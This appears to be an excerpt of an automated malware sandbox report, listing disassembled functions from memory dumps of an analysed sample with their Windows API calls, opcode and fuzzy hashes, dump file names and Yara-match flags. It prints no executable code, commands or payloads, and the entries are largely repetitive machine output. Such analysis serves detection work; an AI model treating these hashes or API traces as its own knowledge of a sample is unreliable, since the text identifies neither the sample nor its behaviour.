                                                                                                                                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00C4FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385535414.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2385529844.0000000000C30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385628844.0000000000D20000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385634354.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385639841.0000000000D34000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385649043.0000000000D37000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385655235.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.2385718233.0000000000DA0000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0009A052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID: .z`
                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                  • Opcode ID: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                                                                                                                                                  • Instruction ID: f9435cd92bba46a372c1278d5618214d5be645425fc5aed6f4f888788f9bae5c
                                                                                                                                                  • Opcode Fuzzy Hash: b937e32ce4266e2ff634f2e213fc7bb1e8e5b5862f511af502ff14cc14d7b27a
                                                                                                                                                  • Instruction Fuzzy Hash: 83E0D8B85003455FDB14EE78D5D24673B85FF812607509A8AEC5947643C164C91987A1
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0009A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(000944F6,?,?,oL,?,000944F6,?,?,?,?,?,00000000,00000000,?), ref: 0009A04D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID: oL
                                                                                                                                                  • API String ID: 1279760036-2581261730
                                                                                                                                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                  • Instruction ID: fb531f36ecf60f8f990f8beeb336912dc4c8dd0bca289f823f6bbc923f289a64
                                                                                                                                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                  • Instruction Fuzzy Hash: E3E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BE185B242C630F9108AF0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0009A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A08D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID: .z`
                                                                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                  • Instruction ID: a291e4ec65558c5148eedba6729c149e861a9d856c25b40a8d06025144360991
                                                                                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                  • Instruction Fuzzy Hash: 25E012B1200208ABDB18EF99CC49EA777ACAF88750F018558BE185B242C630E9108AF0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                                                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                                                                                                                  • Instruction ID: c4677aae8ac412207fcf983d3e5240e210b60c1715605391d1e4e03da92c4e84
                                                                                                                                                  • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
